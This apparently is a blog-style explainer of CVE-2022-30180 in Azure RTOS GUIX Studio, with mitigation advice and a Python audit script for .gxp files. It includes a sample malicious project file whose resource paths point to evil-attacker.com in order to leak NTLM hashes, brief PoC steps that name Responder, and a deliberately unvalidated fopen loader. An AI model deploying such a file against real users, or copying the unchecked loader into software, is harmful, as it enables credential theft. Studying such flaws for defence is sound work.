When it comes to embedded systems, security is not optional. The widely used Azure RTOS GUIX Studio—Microsoft’s graphical user interface framework for embedded devices—has had its share of vulnerabilities. Among them, CVE-2022-30180 is an information disclosure bug that could allow an attacker to exfiltrate sensitive project details just by tricking you into opening a malicious project file.

Let’s break this down, step by step, and see a sample exploitation route.

What is CVE-2022-30180?

CVE-2022-30180 is an information disclosure vulnerability found in Microsoft’s Azure RTOS GUIX Studio (versions prior to 6.1.9). The problem comes from how GUIX Studio opens project (*.gxp) files. If the file is specially crafted, opening it could leak local information—like file paths and secrets—without user consent.

Microsoft’s Bulletin

You can read Microsoft’s advisory here:  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30180

> *"A remote attacker could trick a user into opening a malicious project file, leading to unintentional information disclosure."*

Why Does This Matter?

GUIX Studio targets embedded device development for industries like medical, automotive, IoT, and more. Leaked information could allow attackers to:

- Exfiltrate proprietary IP.

Cybersecurity in embedded development is lagging behind, and vulnerabilities here have real-world consequences.

How the Bug Happens

GUIX Studio loads all referenced resource files in a *.gxp project. If one of these references is redirected (like a UNC share or an external HTTP(S) link), information about your environment (who opened the file, what resources were loaded, mapped drives, etc.) could be sent out without your realizing it.

- Resource reference points to an external server
- Victim’s machine makes a request (includes local path/user info), leaking info

Here’s an example of what an attacker-controlled project.gxp could look like:

```xml
<guix_project>
  <resources>
    <image name="logo" path="\\evil-attacker.com\share\logo.bmp"/>
    <font name="main" path="http://evil-attacker.com/font.ttf"/>
  </resources>
</guix_project>
```

If the victim opens this file:

- Windows tries to access \\evil-attacker.com\share\logo.bmp as a network share, sending the user’s NTLM hash automatically!
- The embedded HTTP resource (font.ttf) exposes the victim’s IP address, User-Agent, and possibly more.

Suppose GUIX Studio loads a project resource with C code along these lines (hypothetical, for illustration; the point is that the path is handed straight to the OS without validation):

```c
// Hypothetical code snippet for illustrative purposes
#include <stdio.h>

static FILE *load_resource(const char *resource_path) {
    // No check on resource_path: a UNC share or URL goes straight to fopen()
    FILE *fp = fopen(resource_path, "rb");
    if (!fp) {
        printf("Error loading resource: %s\n", resource_path);
    }
    // ...proceeds to use the resource
    return fp;
}
```

How to Exploit (PoC)

1. Set up a server to capture SMB or HTTP/HTTPS requests.  
   (e.g., Responder for SMB, or a simple Python HTTP server)
2. Create a .gxp file referencing an image/font on your server.

Real Risks and Mitigations

- Risk: Attackers with access to the supply chain or to file shares could use a .gxp file as an initial infection vector.
- Mitigation: Update GUIX Studio to 6.1.9 or later. Microsoft patched this by adding resource path validation.
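As an added example (not code from the original post, and not GUIX Studio’s own code), here is a small Python audit script covering both the crafted project file shown above and the “resource path validation” mitigation. It parses a .gxp-style XML document and flags every resource path that points off the project: UNC shares, external URLs, absolute paths, and `..` traversal. The element and attribute names (`image`, `font`, `name`, `path`) follow the sample above and are assumptions about the file format, not the real GUIX Studio schema; the sample document is constructed. `resolve_resource` shows the kind of check a loader should apply before a path ever reaches `fopen()`.

```python
"""Audit .gxp-style resource references for paths that leave the project."""
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Constructed sample in the shape of the attacker-controlled project.gxp above,
# plus one benign relative reference, a traversal and an absolute path.
# Tag/attribute names are assumptions, not the real GUIX Studio schema.
SAMPLE_GXP = """<guix_project>
  <resources>
    <image name="logo" path="\\\\evil-attacker.com\\share\\logo.bmp"/>
    <font name="main" path="http://evil-attacker.com/font.ttf"/>
    <image name="bg" path="images\\background.png"/>
    <image name="esc" path="..\\..\\Users\\dev\\secrets.bmp"/>
    <font name="abs" path="C:\\Windows\\Fonts\\arial.ttf"/>
  </resources>
</guix_project>"""


def classify_path(path: str) -> str:
    """Classify one resource path; only 'ok' is a plain relative path."""
    parts = urlsplit(path)
    if parts.scheme and parts.netloc:          # http://, https://, ftp://...
        return "external-url"
    p = PureWindowsPath(path)                  # Windows rules, host-independent
    if p.drive.startswith("\\\\"):             # \\host\share\... (UNC)
        return "unc-share"
    if p.drive or p.root:                      # C:\... or \rooted
        return "absolute"
    if ".." in p.parts:                        # escapes the project directory
        return "traversal"
    return "ok"


def audit_gxp(xml_text: str) -> list[tuple[str, str, str]]:
    """Return (tag, name, verdict) for every resource that is not 'ok'."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        path = elem.get("path")
        if path is None:
            continue
        verdict = classify_path(path)
        if verdict != "ok":
            findings.append((elem.tag, elem.get("name", "?"), verdict))
    return findings


def resolve_resource(project_dir: str, path: str) -> str:
    """Validate a reference and return the path a loader may open.

    This is the check the vulnerable fopen() snippet lacks: anything that is
    not a relative path inside project_dir is rejected instead of opened.
    """
    verdict = classify_path(path)
    if verdict != "ok":
        raise ValueError(f"refusing resource {path!r}: {verdict}")
    return str(PureWindowsPath(project_dir) / path)


if __name__ == "__main__":
    for tag, name, verdict in audit_gxp(SAMPLE_GXP):
        print(f"{verdict:13} <{tag} name={name!r}>")
    print(resolve_resource("C:\\proj", "images\\background.png"))
```

Run it against a project directory’s .gxp files before opening them in GUIX Studio; any `unc-share` or `external-url` finding is exactly the outbound request this CVE relies on, and `traversal`/`absolute` findings are references that should not be in a portable project either.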

See patch notes here:  
https://github.com/azure-rtos/gui_studio/blob/master/CHANGELOG.md

Conclusion and Action Items

CVE-2022-30180 is a reminder: Don’t trust files you didn’t make—especially in embedded development. Review all incoming project files, audit resource links in your projects, and keep GUIX Studio up to date.

Further References

- Microsoft Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30180
- Official Patch Notes: https://github.com/azure-rtos/gui_studio/blob/master/CHANGELOG.md
- Background: https://docs.microsoft.com/en-us/azure/rtos/guix/guix-studio/

Stay safe—embedded systems are low-hanging fruit for cybercriminals. Patch, audit, and verify your toolchain!

Timeline

Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/27/2022 16:17:00 UTC